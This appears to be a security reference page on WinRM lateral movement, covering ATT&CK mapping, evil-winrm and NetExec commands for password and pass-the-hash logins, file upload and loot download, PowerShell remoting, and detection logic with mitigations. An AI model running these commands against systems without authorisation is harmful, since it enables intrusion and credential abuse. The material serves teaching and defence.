WinRM

Overview

Windows Remote Management (WinRM) is Microsoft's implementation of WS-Management for remote command execution. It runs on TCP 5985 (HTTP) and 5986 (HTTPS). WinRM provides PowerShell Remoting, which is the legitimate administration channel in modern Windows environments. For lateral movement, WinRM is attractive because it is a normal management protocol — traffic blends with legitimate admin activity.

ATT&CK Mapping

  • Tactic: TA0008 - Lateral Movement
  • Technique: T1021.006 - Remote Services: Windows Remote Management

Prerequisites

  • Valid credentials with local admin rights (or membership in "Remote Management Users" group)
  • WinRM enabled on the target (enabled by default on Windows Server, often on workstations in managed environments)
  • Network access to TCP 5985 or 5986

Techniques

Evil-WinRM (from Linux)

# Evil-WinRM
# https://github.com/Hackplayers/evil-winrm

# Password authentication
evil-winrm -i <target> -u <user> -p <password>

# Pass-the-hash
evil-winrm -i <target> -u <user> -H '<NThash>'

# With SSL (port 5986)
evil-winrm -i <target> -u <user> -p <password> -S

# Upload/download files
# (from within evil-winrm session)
upload /local/path/file.exe C:\Users\Public\file.exe
download C:\Users\Public\loot.txt /local/path/loot.txt

# Load PowerShell scripts
evil-winrm -i <target> -u <user> -p <password> -s /local/scripts/
# Then call functions from the loaded scripts

NetExec WinRM

# NetExec
# https://github.com/Pennyw0rth/NetExec

# Check WinRM access
nxc winrm <target> -u <user> -p <password>
# (Pwn3d!) = can execute commands

# Execute command
nxc winrm <target> -u <user> -p <password> -x 'whoami'

# Execute PowerShell
nxc winrm <target> -u <user> -p <password> -X 'Get-Process'

# Pass-the-hash
nxc winrm <target> -u <user> -H '<NThash>' -x 'whoami'

# Multiple targets
nxc winrm targets.txt -u <user> -p <password> -x 'hostname'

PowerShell Remoting (from Windows)

# Enter interactive PSSession
Enter-PSSession -ComputerName <target> -Credential <domain>\<user>

# Execute command remotely
Invoke-Command -ComputerName <target> -Credential <domain>\<user> -ScriptBlock { whoami }

# Execute on multiple computers
Invoke-Command -ComputerName server1,server2,server3 -Credential <domain>\<user> -ScriptBlock { hostname }

# Execute a local script remotely
Invoke-Command -ComputerName <target> -Credential <domain>\<user> -FilePath C:\local\script.ps1

Detection Methods

Network-Based Detection

  • WinRM traffic (TCP 5985/5986) between workstations (should normally only be admin to server)
  • High frequency of WinRM connections from a single source

Host-Based Detection

  • Event ID 4624 (Type 3) — network logon via WinRM
  • Event ID 91 — WinRM session created
  • PowerShell script block logging — reveals commands executed remotely
  • Sysmon Event ID 1 — wsmprovhost.exe spawning child processes
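Detection logic for the network frequency check and the host signals listed above, as an added example that is not from the original page: it runs over constructed event records (field names are assumptions, as a SIEM might normalise them), pairs 4624 Type 3 logons with WinRM Event ID 91 on the same host and user to attribute a session to a source address, flags child processes of wsmprovhost.exe, and counts sessions per source.

```python
"""Flag suspicious WinRM activity in constructed Windows event records.
Added example; not from the original page. Field names are assumptions."""
from collections import Counter

ADMIN_SOURCES = {"10.0.9.10"}  # constructed: jump host expected to use WinRM
BURST = 3                      # sessions from one source before alerting

# Constructed sample records: Security 4624, WinRM Operational 91, Sysmon 1.
EVENTS = [
    {"id": 4624, "host": "SRV01", "user": "CORP\\admin", "logon_type": 3, "src_ip": "10.0.9.10"},
    {"id": 91,   "host": "SRV01", "user": "CORP\\admin"},
    {"id": 4624, "host": "WS02", "user": "CORP\\jdoe", "logon_type": 3, "src_ip": "10.0.20.7"},
    {"id": 91,   "host": "WS02", "user": "CORP\\jdoe"},
    {"id": 1,    "host": "WS02", "user": "CORP\\jdoe",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "parent": "C:\\Windows\\System32\\wsmprovhost.exe"},
    {"id": 4624, "host": "WS03", "user": "CORP\\jdoe", "logon_type": 3, "src_ip": "10.0.20.7"},
    {"id": 91,   "host": "WS03", "user": "CORP\\jdoe"},
    {"id": 4624, "host": "WS04", "user": "CORP\\jdoe", "logon_type": 3, "src_ip": "10.0.20.7"},
    {"id": 91,   "host": "WS04", "user": "CORP\\jdoe"},
]

def detect(events, admin_sources=ADMIN_SOURCES, burst=BURST):
    """Return (rule, subject, detail) tuples for suspicious WinRM activity."""
    alerts = []
    # 4624 Type 3 alone is just a network logon; pairing it with WinRM
    # event 91 for the same host and user attributes the session to a source.
    last_logon = {}
    per_source = Counter()
    for e in events:
        key = (e["host"], e["user"])
        if e["id"] == 4624 and e["logon_type"] == 3:
            last_logon[key] = e["src_ip"]
        elif e["id"] == 91:
            src = last_logon.get(key, "unknown")
            per_source[src] += 1
            if src not in admin_sources:
                alerts.append(("winrm_from_unexpected_source", e["host"], src))
        elif e["id"] == 1 and e["parent"].lower().endswith("\\wsmprovhost.exe"):
            # wsmprovhost.exe hosts remote PowerShell; its children are the
            # commands that were executed over WinRM.
            alerts.append(("child_of_wsmprovhost", e["host"], e["image"]))
    for src, n in per_source.items():
        if n >= burst:
            alerts.append(("winrm_session_burst", src, n))
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(*alert)
```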

Mitigation Strategies

  • Restrict WinRM access — limit WinRM to management networks via Windows Firewall or GPO
  • Use JEA (Just Enough Administration) — restrict what commands remote users can execute
  • Enable PowerShell logging — script block logging and transcription capture all remote commands
  • Limit Remote Management Users — only administrators or specifically authorized accounts should have WinRM access
  • Use HTTPS (5986) — encrypt WinRM traffic to prevent credential interception

References

Official Documentation

MITRE ATT&CK